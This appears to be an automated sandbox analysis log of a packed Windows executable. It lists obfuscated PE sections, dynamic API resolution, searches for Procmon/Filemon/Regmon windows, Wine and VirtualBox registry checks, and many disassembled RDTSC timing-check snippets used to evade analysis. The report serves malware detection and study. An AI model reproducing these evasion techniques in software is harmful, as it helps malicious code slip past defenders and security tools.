Source: file.exe | Static PE information: Raw size of mipucltu is bigger than: 0x100000 < 0x197200

              Data Obfuscation

              barindex
              Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.e30000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mipucltu:EW;sqflgmcm:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mipucltu:EW;sqflgmcm:EW;.taggant:EW;
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E56390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00E56390
              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
              Source: file.exeStatic PE information: real checksum: 0x1b1f2b should be: 0x1b3f24
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: mipucltu
              Source: file.exeStatic PE information: section name: sqflgmcm
              Source: file.exeStatic PE information: section name: .taggant
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_011EE11E push 6931AAEFh; mov dword ptr [esp], edx 0_2_011EE12D
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_011EE11E push edx; mov dword ptr [esp], esi 0_2_011EE14E
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_011EE11E push 6F384CFCh; mov dword ptr [esp], ecx 0_2_011EE1AF
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_011EE11E push ecx; mov dword ptr [esp], 7FF6F145h 0_2_011EE217
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_011EE11E push 3310FDA1h; mov dword ptr [esp], eax 0_2_011EE257
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_011EE11E push eax; mov dword ptr [esp], ecx 0_2_011EE3DD
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_011EE11E push 6D130989h; mov dword ptr [esp], esi 0_2_011EE485
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_011EE11E push edx; mov dword ptr [esp], ebx 0_2_011EE4CE
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_011EE11E push edx; mov dword ptr [esp], ecx 0_2_011EE501
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_011EE11E push 5C9BFF53h; mov dword ptr [esp], edx 0_2_011EE53A
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_011EE11E push ebx; mov dword ptr [esp], esi 0_2_011EE55F
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_011EE11E push eax; mov dword ptr [esp], edi 0_2_011EE62C
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_011EE11E push 5E50B9C5h; mov dword ptr [esp], esp 0_2_011EE644
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_011EE11E push ebp; mov dword ptr [esp], esi 0_2_011EE709
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_011EE11E push eax; mov dword ptr [esp], 365F2C5Bh 0_2_011EE779
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_011EE11E push edi; mov dword ptr [esp], ecx 0_2_011EE78A
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_011EE11E push 0D823CD6h; mov dword ptr [esp], edi 0_2_011EE7BD
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_011EE11E push eax; mov dword ptr [esp], 00000093h 0_2_011EE7F0
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_011EE11E push ecx; mov dword ptr [esp], 3BE989B8h 0_2_011EE809
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_011EE11E push edi; mov dword ptr [esp], ebp 0_2_011EE850
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_011EE11E push edi; mov dword ptr [esp], ecx 0_2_011EE893
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_011EE11E push ebx; mov dword ptr [esp], eax 0_2_011EE8E3
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_011EE11E push esi; mov dword ptr [esp], edi 0_2_011EE916
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_011EE11E push ebx; mov dword ptr [esp], ecx 0_2_011EEA51
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_011EE11E push esi; mov dword ptr [esp], 19D3CF81h 0_2_011EEA92
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_011EE11E push 6CC2BA9Ch; mov dword ptr [esp], ecx 0_2_011EEAFB
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_011EE11E push esi; mov dword ptr [esp], edx 0_2_011EEB0D
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_011EE11E push ebx; mov dword ptr [esp], edx 0_2_011EEB1F
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_011EE11E push edx; mov dword ptr [esp], eax 0_2_011EEB34
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_011EE11E push 245F360Bh; mov dword ptr [esp], ebp 0_2_011EEB84
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_011EE11E push 6569CA8Ch; mov dword ptr [esp], ebp 0_2_011EEC2B
              Source: file.exe Static PE information: section name: mipucltu entropy: 7.95313555425277

              Boot Survival

              Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass
              Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
              Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass
              Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass
              Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
              Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass
              Source: C:\Users\user\Desktop\file.exe Window searched: window name: Filemonclass
              Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E56390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00E56390

              Malware Analysis System Evasion

              Source: C:\Users\user\Desktop\file.exe Evasive API call chain: GetUserDefaultLangID, ExitProcess graph_0-26305
              Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine
              Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FBF4C second address: 11FBFA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jne 00007FD7F8DB51FFh 0x0000000c jmp 00007FD7F8DB51F5h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FD7F8DB51F0h 0x00000018 jmp 00007FD7F8DB51F1h 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EF59B second address: 11EF5B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FD7F8BAA156h 0x0000000a popad 0x0000000b jmp 00007FD7F8BAA15Ah 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FAF22 second address: 11FAF62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD7F8DB51F1h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push edi 0x0000000d push edi 0x0000000e pop edi 0x0000000f jmp 00007FD7F8DB51ECh 0x00000014 pop edi 0x00000015 pushad 0x00000016 jo 00007FD7F8DB51E6h 0x0000001c jmp 00007FD7F8DB51EBh 0x00000021 popad 0x00000022 push esi 0x00000023 pushad 0x00000024 popad 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FB359 second address: 11FB35D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FB63C second address: 11FB64C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jng 00007FD7F8DB51E6h 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FE549 second address: 11FE5D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jne 00007FD7F8BAA171h 0x00000010 mov eax, dword ptr [eax] 0x00000012 jo 00007FD7F8BAA164h 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c push ecx 0x0000001d pushad 0x0000001e js 00007FD7F8BAA156h 0x00000024 push edi 0x00000025 pop edi 0x00000026 popad 0x00000027 pop ecx 0x00000028 pop eax 0x00000029 mov di, dx 0x0000002c push 00000003h 0x0000002e push 00000000h 0x00000030 and cx, E7C3h 0x00000035 push 00000003h 0x00000037 mov edx, dword ptr [ebp+122D3709h] 0x0000003d push D1C5D8E4h 0x00000042 jc 00007FD7F8BAA176h 0x00000048 push eax 0x00000049 push edx 0x0000004a jmp 00007FD7F8BAA168h 0x0000004f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FE688 second address: 11FE708 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7F8DB51F3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007FD7F8DB51E8h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 0000001Dh 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 push esi 0x00000027 jmp 00007FD7F8DB51F3h 0x0000002c pop ecx 0x0000002d push 00000000h 0x0000002f pushad 0x00000030 mov dword ptr [ebp+122D33B0h], ebx 0x00000036 mov esi, 6647C55Eh 0x0000003b popad 0x0000003c push CAEDECB3h 0x00000041 pushad 0x00000042 pushad 0x00000043 push edi 0x00000044 pop edi 0x00000045 pushad 0x00000046 popad 0x00000047 popad 0x00000048 push eax 0x00000049 push edx 0x0000004a jmp 00007FD7F8DB51EFh 0x0000004f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FE708 second address: 11FE74C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD7F8BAA156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b add dword ptr [esp], 351213CDh 0x00000012 add dword ptr [ebp+122D277Ch], edx 0x00000018 movsx esi, bx 0x0000001b push 00000003h 0x0000001d mov dword ptr [ebp+122D29DCh], edx 0x00000023 movsx edx, si 0x00000026 push 00000000h 0x00000028 jng 00007FD7F8BAA15Ah 0x0000002e mov si, 9525h 0x00000032 push 00000003h 0x00000034 mov dword ptr [ebp+122D1C0Ch], ebx 0x0000003a push AE490E68h 0x0000003f pushad 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FE74C second address: 11FE750 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FE830 second address: 11FE8DC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FD7F8BAA168h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edi 0x0000000d jmp 00007FD7F8BAA15Ch 0x00000012 pop edi 0x00000013 nop 0x00000014 jp 00007FD7F8BAA15Ch 0x0000001a and edx, dword ptr [ebp+122D36ADh] 0x00000020 mov di, cx 0x00000023 push 00000000h 0x00000025 or edi, dword ptr [ebp+122D370Dh] 0x0000002b push 115B55A6h 0x00000030 jmp 00007FD7F8BAA167h 0x00000035 xor dword ptr [esp], 115B5526h 0x0000003c mov di, dx 0x0000003f push 00000003h 0x00000041 push 00000000h 0x00000043 jmp 00007FD7F8BAA162h 0x00000048 push 00000003h 0x0000004a jmp 00007FD7F8BAA15Ch 0x0000004f call 00007FD7F8BAA159h 0x00000054 push eax 0x00000055 push edx 0x00000056 jmp 00007FD7F8BAA162h 0x0000005b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FE8DC second address: 11FE924 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7F8DB51EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FD7F8DB51EFh 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jmp 00007FD7F8DB51F1h 0x00000018 mov eax, dword ptr [eax] 0x0000001a je 00007FD7F8DB51EAh 0x00000020 push esi 0x00000021 push eax 0x00000022 pop eax 0x00000023 pop esi 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 pushad 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FE924 second address: 11FE96E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FD7F8BAA156h 0x0000000a popad 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pop edx 0x0000000f popad 0x00000010 pop eax 0x00000011 xor dword ptr [ebp+122D2F0Ah], esi 0x00000017 lea ebx, dword ptr [ebp+124523F2h] 0x0000001d push 00000000h 0x0000001f push ecx 0x00000020 call 00007FD7F8BAA158h 0x00000025 pop ecx 0x00000026 mov dword ptr [esp+04h], ecx 0x0000002a add dword ptr [esp+04h], 0000001Ah 0x00000032 inc ecx 0x00000033 push ecx 0x00000034 ret 0x00000035 pop ecx 0x00000036 ret 0x00000037 and si, 38FDh 0x0000003c push eax 0x0000003d push ebx 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 pop eax 0x00000042 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FE96E second address: 11FE972 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121BBB1 second address: 121BBB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121BE76 second address: 121BE7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121BE7C second address: 121BE80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121BE80 second address: 121BEBB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FD7F8DB51F9h 0x0000000a pop esi 0x0000000b jbe 00007FD7F8DB51F5h 0x00000011 jmp 00007FD7F8DB51EFh 0x00000016 pop edx 0x00000017 pop eax 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b push ecx 0x0000001c pop ecx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121BEBB second address: 121BED9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7F8BAA15Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FD7F8BAA15Ah 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121C02E second address: 121C045 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7F8DB51F3h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121C1C1 second address: 121C1D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jno 00007FD7F8BAA156h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121C1D3 second address: 121C1F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FD7F8DB51F0h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f jno 00007FD7F8DB51E6h 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121C1F4 second address: 121C203 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FD7F8BAA15Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121CA61 second address: 121CA73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FD7F8DB51EBh 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121CA73 second address: 121CA80 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121CC23 second address: 121CC57 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD7F8DB51E6h 0x00000008 jmp 00007FD7F8DB51ECh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jo 00007FD7F8DB51E6h 0x00000016 push eax 0x00000017 pop eax 0x00000018 jmp 00007FD7F8DB51EEh 0x0000001d ja 00007FD7F8DB51E6h 0x00000023 popad 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121CC57 second address: 121CC5C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121CDB5 second address: 121CDB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E89DA second address: 11E89F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7F8BAA169h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121CEEB second address: 121CF03 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7F8DB51F4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121CF03 second address: 121CF1D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 pop edx 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 pushad 0x00000012 js 00007FD7F8BAA156h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121D463 second address: 121D467 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121D467 second address: 121D46B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121D46B second address: 121D48C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD7F8DB51F8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121D48C second address: 121D494 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121D5CD second address: 121D5F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD7F8DB51F8h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007FD7F8DB51E6h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1221B73 second address: 1221B90 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7F8BAA15Bh 0x00000007 jmp 00007FD7F8BAA15Ah 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1221B90 second address: 1221B94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EC019 second address: 11EC021 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EC021 second address: 11EC05C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD7F8DB51F5h 0x00000009 jmp 00007FD7F8DB51F9h 0x0000000e popad 0x0000000f jc 00007FD7F8DB51F2h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EC05C second address: 11EC062 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122305A second address: 1223080 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jp 00007FD7F8DB51E6h 0x0000000f jmp 00007FD7F8DB51F3h 0x00000014 push esi 0x00000015 pop esi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F5F0D second address: 11F5F13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12262FA second address: 12262FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12262FF second address: 122632A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d pushad 0x0000000e jnp 00007FD7F8BAA158h 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 push ebx 0x00000017 pushad 0x00000018 popad 0x00000019 pop ebx 0x0000001a popad 0x0000001b mov eax, dword ptr [eax] 0x0000001d jbe 00007FD7F8BAA162h 0x00000023 je 00007FD7F8BAA15Ch 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122B8F2 second address: 122B8F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122B8F8 second address: 122B93C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7F8BAA15Fh 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FD7F8BAA165h 0x00000014 jmp 00007FD7F8BAA166h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122AD74 second address: 122AD7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EBFF8 second address: 11EC019 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7F8BAA167h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122B089 second address: 122B09C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007FD7F8DB51EDh 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122B1A7 second address: 122B1AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122B1AB second address: 122B1D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7F8DB51F6h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jns 00007FD7F8DB51ECh 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122BFD1 second address: 122BFF8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FD7F8BAA166h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jc 00007FD7F8BAA158h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122BFF8 second address: 122BFFD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122C5AE second address: 122C5B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FD7F8BAA156h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122C5B9 second address: 122C5BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122CFB0 second address: 122CFB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122CFB4 second address: 122CFD2 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD7F8DB51E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD7F8DB51F0h 0x00000013 rdtsc
